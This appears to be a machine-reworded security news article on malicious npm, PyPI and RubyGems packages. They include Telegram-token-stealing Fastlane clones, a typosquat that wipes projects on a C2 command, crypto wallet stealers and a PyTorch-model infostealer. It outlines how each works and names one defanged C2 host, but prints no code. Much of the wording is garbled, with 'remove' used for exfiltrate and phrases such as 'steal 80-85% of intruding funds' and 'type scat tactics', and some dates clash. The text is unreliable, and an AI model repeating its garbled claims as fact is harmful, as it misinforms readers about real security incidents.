Several malicious packages have been discovered throughout the NPM, Python and Ruby package repositories. This illustrates the various supply chain threats that drain money from cryptocurrency wallets, erase the entire codebase after installation, remove telegram API tokens, and once again lurk in the open source ecosystem.
The findings come from multiple reports published by CheckMarx, ReversingLab, Safety, and Sockets. Below is a list of packages identified across these platforms –
Socket noted that two malicious gems were released by threat actors under the alias BùiNam, Buidanhnam and Si_Mobile days after Vietnam ordered a nationwide ban on telegram messaging apps later last month.
“These gems quietly remove all data sent to the Telegram API by redirecting traffic through a command and control (C2) server controlled by threat actors,” says Socket Researcher Kirill Boychenko. “This includes bot tokens, chat IDs, message content and attachments.”
The software supply chain security company said the gem is a “nearly identical clone” of the legitimate Fastlane plugin “FastLane-Plugin-Telegram”, a library widely used to send deployment notifications from the CI/CD pipeline to the Telegram channel.
Malicious changes introduced by threat actors work effectively as a dependency between victims and the Telegram API, while tweaking the network endpoints used to send and receive telegram messages to hardcoded servers while harvesting sensitive data (“Rough-Breeze-0C37.Buidanhnam95.workers(.)dev”).
Given that the malware itself is not region-specific and lacks geofencing logic to restrict its execution to Vietnamese systems, it is suspected that attackers simply exploited the state’s telegram ban to distribute forged libraries under the guise of a proxy.
“This campaign shows how quickly threat actors can leverage geopolitical events to launch targeted supply chain attacks,” Boychenko said. “We have leveraged the trust of the package ecosystem that permeates CI/CD environments by weaponizing widely used development tools such as FastLane and disguising the ability to impersonate the credentials behind timely “proxy” features. ”
Socket said the legal conversion tool “XLSX-to-JSON-LC” discovered an NPM package called “XLSX-to-JSON-LH” called Typosquats, causing unsuspecting developers to explode malicious payloads when importing the package. It was first published in February 2019 and was subsequently deleted.
“This package contains a hidden payload that establishes a permanent connection to a command and control (C2) server,” said security researcher Kush Pandya. “When triggered, you can delete the entire project directory without warning or recovery options.”
Specifically, when the French command “remise à zéro” (meaning “reset”) is issued by the C2 server, the destruction action is unlocked, and the package removes the source code file, version control data, configuration files, node_modules (including itself), and all project assets.
Another set of malicious NPM packages – pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-rendiction, ethereum-smart contract, and env-process are known to steal 80-85% of intruding funds using offensive code using victim Ethereum or BSC wallet.
The package, uploaded by a user named @crypto-exploit, attracted over 2,100 downloads using “pancake_uniswap_validators_utils_snipe” published four years ago. Currently, it is no longer possible to download.
A similar cryptocurrency-themed malicious package discovered on Pypi has built-in Covert functionality, stolen Solana private keys, source code and other sensitive data from the compromised system. It is worth noting that the “semantic type” was benign when it was first uploaded on December 22, 2024, but a malicious payload was introduced as an update on January 26, 2025.
One collection of Pypi packages is designed to “monkey patch” the “monkey patch” Solana key generation method by modifying the associated functions at runtime without modifying the original source code.
The threat actors behind the Python packages that were published to the repository using alias capperships are said to have used sophisticated ReadMe files to lend out their reliability and linked them to the GitHub repository to download users.
“Every time a key pair is generated, the malware captures the private key,” Boychenko said. “Then we encrypt the key using a hard-coded RSA‑ 2048 public key and encode the result into Base64. The encrypted key is embedded in the SPL.MEMO transaction and sent to Solana Devnet, where the threat actor can get it and decrypt it to get full access to the stolen wallet.”
According to Vancouver-based safety, the second batch of 11 Python packages targeting the Solana ecosystem was uploaded to Pypi from May 4th to 24th, 2025. The package is designed to steal Python script files from the developer system and send them to an external server. One of the identified packages, “Solana-Live,” has also been discovered to target exfiltration’s Jupyter notebooks, claiming to be a “price acquisition library.”
In the sign where Typosquatting continues to be a critical attack vector, CheckMarx has flagged six malicious Pypi packages impersonating Colorama. This is a widely used Python package for coloring terminal output, and Colorizr, a color conversion JavaScript library available in NPM.
“Tactics to use the names of one ecosystem (npm) to attack users from different ecosystems (PYPIs), are unusual,” the company said. “Payloads allow for persistent remote access and remote control to desktops and servers, as well as the harvest and removal of sensitive data.”
What’s noteworthy about the campaign is that targeting users on both Windows and Linux systems, malware can establish connections with the C2 server, remove susceptibility environment variables and configuration information, and take steps to bypass endpoint security controls.
That said, whether Linux and Windows payloads are the same attacker’s work now increases the likelihood that they are separate campaigns that abuse similar type scat tactics.
Malicious actors have not been wasting time harboring the growing popularity of artificial intelligence (AI) tools and poisoning the software supply chain with Pypi packages such as Aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk, and aliyun-ai-labs-sdk.
The malicious package was published on PYPI on May 19, 2024 and was available for download in less than 24 hours. However, the three packages were collectively downloaded over 1,700 times before being pulled out of the registry.
“Once installed, the malicious package provides a payload of the infosealer hidden within the Pytorch model loaded from the initialization script,” said Karlo Zanki, a researcher at ReversingLabs. “The malicious payload removes basic information about the infected machine and the contents of the .gitconfig file.”
The malicious code embedded within the model is equipped to collect details about the logged users, the network addresses of infected machines, the names of the organizations to which the machine belongs, and the contents of the .gitconfig file.
Interestingly, the organization name is obtained by reading the “_utmc_lui_” settings key from the configuration of the Alimeeting Online Meeting application, a popular video conferencing application in China. This suggests that the potential target for the campaign is a developer in China.
Furthermore, this attack helps to highlight the growing threat posed by the misuse of machine learning model forms such as pickle.
“Threat actors are constantly trying to find security tools and new ways to hide malicious payloads from security analysts,” says Zanki. “This time they were using the ML model. This is a new approach for the distribution of malware through the PYPI platform. This is a clever approach as they are only beginning to implement support for the detection of malicious features within the ML model.”
